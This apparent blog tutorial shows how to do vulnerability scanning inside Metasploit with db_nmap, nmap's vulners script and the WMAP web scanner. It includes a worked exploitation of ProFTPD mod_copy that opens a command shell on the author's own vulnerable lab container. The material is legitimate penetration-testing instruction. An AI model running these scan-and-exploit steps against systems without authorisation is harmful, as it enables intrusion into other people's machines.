Vulnerability Scanning with Metasploit
In testing Kali Nethunter on my OnePlus One I have been on the hunt for tools and workflows that can run on something as lightweight as an Android phone. I also want to see how far I can get without me having to run an external server.
Vulnerability scanning using OpenVAS, Nessus, or anything else is definitely not something that runs well on lightweight hardware. In my experience, a dedicated vulnerability scanner is pretty resource intensive.
So in using Metasploit as my primary tool for exploiting vulnerable software, I wanted to document some tips I’ve found to do vulnerability scanning using Metasploit. I will update this post if I find more workflows.
Nmap + Metasploit:
I recently found out that you can use nmap directly from Metasploit using the db_nmap module. Using this module is really nice because you can get the service results imported directly into Metasploit.
Here’s an example db_nmap command in Metasploit:
msf6 > db_nmap -sV 192.168.1.5
Here’s the output (this host is running my vulnerable Docker container):
msf6 > db_nmap -sV 192.168.1.5
[*] Nmap: Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-08 03:47 UTC
[*] Nmap: Nmap scan report for 192.168.1.5 (192.168.1.5)
[*] Nmap: Host is up (0.12s latency).
[*] Nmap: rDNS record for 192.168.1.5: 192.168.1.5.vultr.com
[*] Nmap: Not shown: 991 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 21/tcp open ftp ProFTPD 1.3.5
[*] Nmap: 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
[*] Nmap: 25/tcp filtered smtp
[*] Nmap: 80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
[*] Nmap: 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: 631/tcp open ipp CUPS 1.7
[*] Nmap: 6667/tcp open irc UnrealIRCd
[*] Nmap: Service Info: Hosts: VULN, irc.TestIRC.net; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 18.18 seconds
Now, Metasploit is aware of those services on that host. Check with the services command:
msf6 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.1.5 21 tcp ftp open ProFTPD 1.3.5
192.168.1.5 22 tcp ssh open OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 Ubuntu Linux; proto
col 2.0
192.168.1.5 25 tcp smtp filtered
192.168.1.5 80 tcp http open Apache httpd 2.4.7 (Ubuntu)
192.168.1.5 139 tcp netbios-ssn open Samba smbd 3.X - 4.X workgroup: WORKGROUP
192.168.1.5 445 tcp netbios-ssn open Samba smbd 3.X - 4.X workgroup: WORKGROUP
192.168.1.5 631 tcp ipp open CUPS 1.7
192.168.1.5 6667 tcp irc open UnrealIRCd
With db_nmap it will automatically import vulnerabilities if you use any of nmap’s vulnerability scanning scripts.
Here’s an example command:
msf6 > db_nmap -sV --script=vulners.nse 192.168.1.5
Once that command completed, I could use the vulns command to check out the exploits stored in Metasploit that were discovered using nmap:
msf6 > vulns
Vulnerabilities
===============
Timestamp Host Name References
--------- ---- ---- ----------
2021-08-08 03:55:55 UTC 192.168.1.5 cpe:/a:proftpd:proftpd:1.3.5 CVE-2015-3306,SAINT:950EB68D408A40399926A4CCAD3CC62E,SAINT:63FB77B9136D48259E4F0D4CDA35E957,SAINT:1B08F4664C428B180EEC9617B41D9A2C,PROFTPD_MOD_COPY,PACKETSTORM:162777,PACKETSTORM:132218,PACKETSTORM:131567,PACKETSTORM:131555,PACKETSTORM:131505,MSF:EXPLOIT/UNIX/FTP/PROFTPD_MODCOPY_EXEC,EDB-ID:49908,EDB-ID:37262,EDB-ID:36803,EDB-ID:36742,1337DAY-ID-23720,1337DAY-ID-23544,SSV:61050,MSF:ILITIES/SUSE-CVE-2019-18217/,CVE-2019-19272,CVE-2019-19271,CVE-2019-19270,CVE-2019-18217,CVE-2016-3125,CVE-2013-4359,CVE-2017-7418
<snipped>
You can see there is a vulnerability that Metasploit has an exploit for in the above output of vulns:
MSF:EXPLOIT/UNIX/FTP/PROFTPD_MODCOPY_EXEC
So let’s exploit it:
msf6 > use exploit/unix/ftp/proftpd_modcopy_exec
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set RHOSTS 192.168.1.5
RHOSTS => 192.168.1.5
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set SITEPATH /var/www/html
SITEPATH => /var/www/html
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set payload cmd/unix/bind_awk
payload => cmd/unix/bind_awk
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > run
[*] 192.168.1.5:80 - 192.168.1.5:21 - Connected to FTP server
[*] 192.168.1.5:80 - 192.168.1.5:21 - Sending copy commands to FTP server
[*] 192.168.1.5:80 - Executing PHP payload /VlrUb.php
[*] Started bind TCP handler against 192.168.1.5:4444
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.1.5:4444) at 2021-08-08 04:21:30 +0000
There we go! Shell created using the results of a vulnerability scan performed on an Android phone. Epic.
I would recommend using more nmap vulnerability scanning scripts with Metasploit’s db_nmap module. I found this article very useful on vulnerability scanning with nmap:
How to Detect CVEs Using Nmap Vulnerability Scan Scripts
Web Application Vulnerability Scans:
This was also news to me, but Metasploit has a built-in web application vulnerability scanning module: WMAP:
The documentation for WMAP in somebody else’s old Github repo of Metasploit’s outlines what makes WMAP special:
https://github.com/lattera/metasploit/blob/master/documentation/wmap.txt
It doesn’t look like it’s been updated for 10 years. Per the explanation in the link above, WMAP will use information stored in the database to intelligently attack your target. In addition, you can create WMAP profiles to use newer or even custom modules in Metasploit – this makes WMAP extensible and still relevant.
Let’s try it out.
First, load wmap and configure your target:
msf6 > load wmap
.-.-.-..-.-.-..---..---.
| | | || | | || | || |-'
`-----'`-'-'-'`-^-'`-'
[WMAP 1.5.1] === et [ ] metasploit.com 2012
[*] Successfully loaded plugin: wmap
msf6 > wmap_sites -a http://192.168.1.5
[*] Site created.
msf6 > wmap_targets -t http://192.168.1.5/drupal
msf6 > wmap_targets -l
[*] Defined targets
===============
Id Vhost Host Port SSL Path
-- ----- ---- ---- --- ----
0 192.168.1.5 192.168.1.5 80 false /drupal
Next, run tests against your target:
msf6 > wmap_run -t
[*] Testing target:
[*] Site: 192.168.1.5 (192.168.1.5)
[*] Port: 80 SSL: false
============================================================
[*] Testing started. 2021-08-08 04:43:27 +0000
[*] Loading wmap modules...
<snipped>
Finally, run your scan:
msf6 > wmap_run -e
[*] Using ALL wmap enabled modules.
[-] NO WMAP NODES DEFINED. Executing local modules
[*] Testing target:
[*] Site: 192.168.1.5 (192.168.1.5)
[*] Port: 80 SSL: false
============================================================
[*] Testing started. 2021-08-08 04:50:06 +0000
[*]
=[ SSL testing ]=
============================================================
[*] Target is not SSL. SSL modules disabled.
[*]
=[ Web Server testing ]=
============================================================
[*] Module auxiliary/scanner/http/http_version
[+] 192.168.1.5:80 Apache/2.4.7 (Ubuntu)
[*] Module auxiliary/scanner/http/open_proxy
[*] Module auxiliary/admin/http/tomcat_administration
<snipped>
Using Custom WMAP profiles:
In the Metasploit Github repo there is some documentation showing how you can extend WMAP to use other modules using WMAP profiles:
Here’s the file:
#
# WMAP 1.0 Sample Profile
# wmap_run -e /path/to/profile
#
# Just add the name of the module. Use # for comments
#
frontpage
frontpage_login
options
version
backup_file
#blind_sql_query
#brute_dirs
copy_of_file
dir_listing
dir_scanner
file_same_name_dir
writable
You can see from the comments in the file that you can extend WMAP to use other modules. This makes WMAP really useful as you can test newer or custom Metasploit modules against a web server.
So as an easy example, you could use that example profile, place it in /tmp/wmap-profile and then run the WMAP profile with the following command in Metasploit:
msf6 > wmap_run -e /tmp/wmap-profile
As I stated earlier, this makes WMAP extensible and will probably keep it forever useful as Rapid 7 continues to create and update Metasploit’s modules.